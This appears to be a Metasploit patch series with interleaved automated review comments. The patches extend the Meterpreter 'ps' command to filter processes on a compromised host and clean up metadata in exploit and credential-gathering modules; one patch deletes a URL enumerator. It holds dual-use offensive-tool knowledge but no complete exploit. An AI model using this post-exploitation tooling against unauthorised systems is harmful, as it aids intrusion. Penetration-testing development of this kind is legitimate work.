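Review bot: The `val.nil? or val.empty?` guard in the new `-S` branch sits inside `processes.each`, so it is re-evaluated for every process and skipped entirely when the target returns no processes; it belongs above the loop. The search term is also interpolated unescaped into `/#{val}/` and recompiled per process, so a malformed term (the help text's own `*.svc.*` is one) raises `RegexpError` out of the command; compile it once under `rescue RegexpError` and match against `proc["name"].to_s`. Note as well that `client.sys.process.get_processes` is called before `@@ps_opts.parse(args)`, so `ps -h` costs a round trip to the agent just to print help; parse first, then fetch. `cmd_ps` continues past the end of this hunk.
```ruby
when "-S"
  if val.nil? or val.empty?
    print_line "You must supply a search term!"
    return false
  end
  begin
    name_re = Regexp.new(val)
  rescue RegexpError => e
    print_line "Invalid regular expression '#{val}': #{e.message}"
    return false
  end
  print_line "Filtering on process name..."
  searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
  processes.each do |proc|
    searched_procs << proc if name_re.match(proc["name"].to_s)
  end
  processes = searched_procs
```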
@@ -286,40 +306,14 @@ class Console::CommandDispatcher::Stdapi::Sys return true end - def cmd_findpids(*args) - if args.empty? or args.include? "-h" - cmd_findpids_help - return true - end - processes = client.sys.process.get_processes - if (processes.length == 0) - print_line("No running processes were found.") - else - searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| - args.each do |arg| - if proc["name"].match(/#{arg}/) - searched_procs << proc - break - end - end - end - searched_procs.compact! - if searched_procs.length == 0 - print_line("No running processes were found matching the supplied names.") - else - print_line - print_line(searched_procs.to_table("Indent" => 1).to_s) - print_line - end - end - return true - end - - def cmd_findpids_help - print_line "You must supply one or more process name to search for" - print_line "e.g. findpids explorer.exe notepad.exe" - print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + def cmd_ps_help + print_line "Use the command with no arguments to see all running processes." + print_line "You may supply a search term to filter the results:" + print_line "\t ps -S explorer.exe" + print_line "\t Would return any processes named explorer.exe" + print_line "You may also pass Regular Expressions:" + print_line "\tps -S *.svc.* " + print_line "Would return any processes with 'svc' in the name" end # From 1fd4c8867cd49ac36522a84a0270e2f54618c851 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 21 Sep 2012 13:27:16 -0500 Subject: [PATCH 16/74] Add a bunch of extra filter options --- .../console/command_dispatcher/stdapi/sys.rb | 40 ++++++++++++++++++- 1 file changed, 38 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index f3683f980a..152ef980bc 100644 
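Review bot: The regex example in the new `cmd_ps_help`, `ps -S *.svc.*`, is not a valid Ruby regular expression — a leading `*` has no repeat target — so a user following it gets a `RegexpError` from `-S` rather than a filtered list; `ps -S svc` (or `.*svc.*`) demonstrates what the sentence describes. The example lines also mix `"\t ps -S explorer.exe"` (tab plus space) with `"\tps -S *.svc.* "` (tab only, trailing space); one consistent indent prefix reads cleaner in the console.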
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -47,7 +47,10 @@ class Console::CommandDispatcher::Stdapi::Sys @@ps_opts = Rex::Parser::Arguments.new( "-h" => [false, "Help menu."], - "-S" => [true, "RegEx term(s) to filter results with "]) + "-S" => [true, "RegEx term to filter on process name with "], + "-A" => [true, "Arch to filter on (x86 or x86_64"], + "-s" =>[false, "Show only SYSTEM processes"], + "-U" => [true, "RegEx term to filter on user name with"]) # # List of supported commands. @@ -284,7 +287,7 @@ class Console::CommandDispatcher::Stdapi::Sys cmd_ps_help return true when "-S" - print_line "Performing Search..." + print_line "Filtering on process name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new processes.each do |proc| if val.nil? or val.empty? 
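Review bot: The `-A` option text `"Arch to filter on (x86 or x86_64"` is missing its closing parenthesis, and `"-s" =>[false, ...]` drops the space after `=>` that the neighbouring entries keep; `"Arch to filter on (x86 or x86_64)"` and `"-s" => [false, "Show only SYSTEM processes"]` match the rest of the table. The `-S` description `"RegEx term to filter on process name with "` also carries a trailing space that shows up in the rendered help.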
@@ -294,6 +297,36 @@ class Console::CommandDispatcher::Stdapi::Sys searched_procs << proc if proc["name"].match(/#{val}/) end processes = searched_procs + when "-A" + print_line "Filtering on arch..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + next if proc['arch'].nil? or proc['arch'].empty? + if val.nil? or val.empty? or !(val == "x86" or val == "x86_64") + print_line "You must select either x86 or x86_64" + return false + end + searched_procs << proc if proc["arch"] == val + end + processes = searched_procs + when "-s" + print_line "Filtering on SYSTEM processes..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM" + end + processes = searched_procs + when "-U" + print_line "Filtering on user name..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if val.nil? or val.empty? + print_line "You must supply a search term!" + return false + end + searched_procs << proc if proc["user"].match(/#{val}/) + end + processes = searched_procs end end if (processes.length == 0) @@ -316,6 +349,8 @@ class Console::CommandDispatcher::Stdapi::Sys print_line "Would return any processes with 'svc' in the name" end + + # # Reboots the remote computer. # @@ -627,6 +662,7 @@ class Console::CommandDispatcher::Stdapi::Sys client.sys.power.shutdown end + end end From 30bfa7cee6db4a3fd03dcd59941eaaba3daa5504 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 21 Sep 2012 13:45:09 -0500 Subject: [PATCH 17/74] Fix up the ps help --- .../console/command_dispatcher/stdapi/sys.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) 
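Review bot: The `-s` filter compares `proc["user"]` with the literal `"NT AUTHORITY\\SYSTEM"`, which is the English display name of that account; on a localized Windows (German builds render it as `NT-AUTORITÄT\SYSTEM`, for example) or a non-Windows Meterpreter the filter silently yields an empty list with no hint why. At minimum say so in the option text, `"-s" => [false, "Show only SYSTEM processes (matches the English account name NT AUTHORITY\\SYSTEM)"]`, or match the account suffix case-insensitively and document the trade-off. The `-A` and `-U` branches repeat the in-loop `val` validation from `-S`; in `-A` the check even sits after `next if proc['arch'].nil? or proc['arch'].empty?`, so an invalid arch is never reported when no process carries an arch field, and `-U` calls `proc["user"].match(...)` on a value the code elsewhere treats as possibly missing — use `proc["user"].to_s` and hoist both guards above their loops. The blank lines added after `cmd_ps_help` and before the final `end` are noise and should be dropped.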
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 152ef980bc..5e09ef8cd5 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -341,12 +341,23 @@ class Console::CommandDispatcher::Stdapi::Sys def cmd_ps_help print_line "Use the command with no arguments to see all running processes." - print_line "You may supply a search term to filter the results:" - print_line "\t ps -S explorer.exe" - print_line "\t Would return any processes named explorer.exe" - print_line "You may also pass Regular Expressions:" - print_line "\tps -S *.svc.* " - print_line "Would return any processes with 'svc' in the name" + print_line "The following options can be used to filter those results:" + + tbl = Rex::Ui::Text::Table.new( + 'Header' => "Options List", + 'Indent' => 1, + 'Columns' => + [ + "Option", + "Details" + ] + ) + + tbl << ["-s", "Display only SYSTEM processes"] + tbl << ["-S ", "Filters processes on the process name using the supplied RegEx"] + tbl << ["-A ", "Filters processes on the arch. (x86, x86_64)"] + tbl << ["-U ", "Filters processes on the user using the supplied RegEx"] + print_line tbl.to_s end From e94c68d85b00d2a91b18a9ee80464707e25e0b0b Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 18:38:18 +0200 Subject: [PATCH 18/74] Author cleanup: One module did not have an author --- modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 4f6ca6c41a..5d071eaf46 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb 
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', # Description? - # Author? + 'Author' => 'unknown', 'Version' => '$Revision$', 'Platform' => 'osx', 'References' => From ece6d84e922555bfd4ebc90e25a837d52509839d Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 19:45:27 +0200 Subject: [PATCH 19/74] Author cleanup: fix unmatched angle brackets --- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 2 +- modules/post/multi/manage/multi_post.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index e79017f398..90c2e0ac99 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, - 'Author' => [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ], + 'Author' => [ '', '', 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index ac80e2283c..ef57b64601 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post of the module against the sessions and validation of the options provided. }, 'License' => MSF_LICENSE, - 'Author' => [ 'carlos_perez[at]darkoperator.com>'], + 'Author' => [ ''], 'Version' => '$Revision$', 'Platform' => [ 'windows', 'unix', 'osx', 'linux', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] From 2bb498c4b3ba8a147f70d212c0d9907853b91659 Mon Sep 17 00:00:00 2001 
From: Michael Schierl Date: Mon, 22 Oct 2012 20:04:21 +0200 Subject: [PATCH 20/74] DisclosureDate cleanup: Try parsing all dates Fix all dates unparsable by `Date.strptime(value, '%b %d %Y')` --- modules/exploits/windows/local/ask.rb | 2 +- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/exploits/windows/local/service_permissions.rb | 2 +- modules/exploits/windows/smtp/wmailserver.rb | 2 +- modules/post/windows/escalate/bypassuac.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 88b377e56d..95009ac41d 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], - 'DisclosureDate'=> "Jan 3, 2012" + 'DisclosureDate'=> "Jan 3 2012" )) register_options([ diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index f919f9b3c8..3788b2c7ee 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], - 'DisclosureDate'=> "Dec 31, 2010" + 'DisclosureDate'=> "Dec 31 2010" )) end diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index a4e7fe8da9..cc1733a38e 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'DisclosureDate'=> "Oct 15, 2012" + 'DisclosureDate'=> "Oct 15 2012" )) register_options([ 
diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index ab89caf331..50b342259e 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 11 2005 ')) + 'DisclosureDate' => 'Jul 11 2005')) register_options([ Opt::RPORT(25) ], self.class) end diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index d6fde61719..06ef199e58 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], - 'DisclosureDate'=> "Dec 31, 2010" + 'DisclosureDate'=> "Dec 31 2010" )) register_options([ From c17b026db9e6318d0e9dcbae79d9171ba5ad0053 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:14:39 +0200 Subject: [PATCH 21/74] Platform cleanup: platform should be lowercase --- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 2 +- modules/post/windows/manage/mssql_local_auth_bypass.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 13026d076a..98cb5833df 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x83\xec\x7f", 'DisableNops' => 'True', }, - 'Platform' => 'BSD', + 'Platform' => 'bsd', 'Arch' => ARCH_X86, 'Targets' => [ diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 1e902fa457..fa602e08a6 100644 
--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post However, this can be overcome by migrating to the SQL Server process.}, 'License' => MSF_LICENSE, 'Author' => [ 'Scott Sutherland '], - 'Platform' => [ 'Windows' ], + 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) From 3bf612aec8ba8d51722a58d0ea155e53242b4a42 Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:28:02 +0200 Subject: [PATCH 22/74] Arch/Platform cleanup: aux modules need neither --- modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 1 - modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb | 1 - modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb | 1 - modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 1 - modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb | 1 - 5 files changed, 5 deletions(-) diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index 57f8dcad50..47d57073a7 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'jduck', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'Platform' => [ 'win' ], 'References' => [ [ 'OSVDB', '65533'], diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 828ffee880..eb8924aea7 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'nullbind ' ], 'License' => MSF_LICENSE, - 'Platform' => [ 'win' ], 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]] )) 
diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 203587be41..b6c9dba312 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'Platform' => [ 'win' ], 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]] )) diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 403e11c6da..c45bc2aa67 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary Code execution may be possible however this module is only a DoS. }, 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 3365bd54ef..0d6967348a 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary [ 'EDB', 15803 ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ] ], - 'Platform' => [ 'win' ], 'DisclosureDate' => 'Dec 21 2010')) register_options( From 595d0821c58da594ddbbfe379db60cf7808fd0be Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Mon, 22 Oct 2012 20:36:49 +0200 Subject: [PATCH 23/74] Privileged cleanup: auxiliary modules can't --- modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 1 - modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 1 - 2 files changed, 2 deletions(-) 
diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index 47d57073a7..e25693f213 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '65533'], [ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ] ], - 'Privileged' => true, 'DisclosureDate' => 'Jun 15 2010' ) diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 6cb8a84a35..28f0f916b1 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1'] ], # Tested OK against sol8.tor 20100624 -jjd - 'Privileged' => true, 'DisclosureDate' => 'Jan 22 2003') register_options( From d38629275410d2c341ad9f24f06cc30c87022d92 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 14:46:52 -0400 Subject: [PATCH 24/74] remove non-functional enum_delicious module --- .../auxiliary/scanner/http/enum_delicious.rb | 112 ------------------ 1 file changed, 112 deletions(-) delete mode 100644 modules/auxiliary/scanner/http/enum_delicious.rb diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb deleted file mode 100644 index a04c7fc52c..0000000000 --- a/modules/auxiliary/scanner/http/enum_delicious.rb +++ /dev/null 
@@ -1,112 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'net/http' - -class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Del.icio.us Domain Links (URLs) Enumerator', - 'Description' => %q{ - This module pulls and parses the URLs stored by Del.icio.us users for the - purpose of replaying during a web assessment. Finding unlinked and old pages. - }, - 'Author' => [ 'Rob Fuller ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) - - register_options( - [ - OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), - OptString.new('OUTFILE', [ false, "Where to output the list for use"]) - ], self.class) - - register_advanced_options( - [ - OptString.new('PROXY', [ false, "Proxy server to route connection. :",nil]), - OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]), - OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil]) - ], self.class) - - end - - def pull_urls(targetdom) - response = "" - list = [] - lastpage = 0 - pagenum = 1 - while lastpage == 0 - print_status("Page number: " + pagenum.to_s) - header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"} - clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com") - resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header) - response << resp.body - response.each_line do |line| - list << line.gsub!(/(.+ Date: Mon, 22 Oct 2012 20:53:17 +0200 Subject: [PATCH 25/74] Version cleanup Remove all values that are neither 0 nor $Revision$. 
--- modules/auxiliary/gather/d20pass.rb | 2 +- modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb | 2 +- modules/auxiliary/scanner/h323/h323_version.rb | 2 +- modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb | 2 +- modules/auxiliary/server/capture/drda.rb | 2 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +-- modules/auxiliary/vsploit/pii/web_pii.rb | 2 +- modules/encoders/x86/context_cpuid.rb | 2 +- modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb | 2 +- modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 2 +- .../multi/http/struts_code_exec_exception_delegator.rb | 2 +- .../exploits/windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/fileformat/csound_getnum_bof.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_launch.rb | 2 +- modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/mplayer_sami_bof.rb | 2 +- .../exploits/windows/fileformat/orbit_download_failed_bof.rb | 1 - modules/exploits/windows/fileformat/vlc_realtext.rb | 2 +- modules/exploits/windows/http/bea_weblogic_post_bof.rb | 2 +- .../windows/http/landesk_thinkmanagement_upload_asp.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb | 2 +- .../misc/citrix_streamprocess_get_boot_record_request.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_footer.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_objects.rb | 2 +- modules/exploits/windows/misc/gimp_script_fu.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_new_folder.rb | 2 +- modules/post/multi/manage/sudo.rb | 2 +- modules/post/windows/gather/credentials/imvu.rb | 2 +- modules/post/windows/gather/credentials/outlook.rb | 2 +- 31 files changed, 30 insertions(+), 32 deletions(-) 
diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index cee450d9c1..43df04d3d7 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'K. Reid Wightman ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 1 $', + 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 374eb2aeb3..bc32a33858 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision: 13962 $', + 'Version' => '$Revision$', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 894c068fb2..46996d1f8f 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'H.323 Version Scanner', - 'Version' => '$Revision: 9804 $', + 'Version' => '$Revision$', 'Description' => 'Detect H.323 Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 59a3fc7750..3d479efee3 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb 
@@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access', - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 32af81f035..b71f9f1ce8 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)', - 'Version' => '$Revision: 14774 $', + 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index a23072a310..2edb6392ec 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Relayer', - 'Version' => '$Revision:$', + 'Version' => '$Revision$', 'Description' => %q{ This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. @@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Rich Lundeen ', ], - 'Version' => '$Revision:$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index f9b95c8381..7126189bb4 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb 
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => 'This module emulates a webserver leaking PII data', 'License' => MSF_LICENSE, 'Author' => 'MJC', - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com'], diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index 860937d9f4..bd854efa4e 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'CPUID-based Context Keyed Payload Encoder', - 'Version' => '$Revision: 1$', + 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai. }, diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 585540d1c9..5f0eae911d 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '73609' ], [ 'EDB', '17487' ] ], - 'Version' => '$Revision: $', + 'Version' => 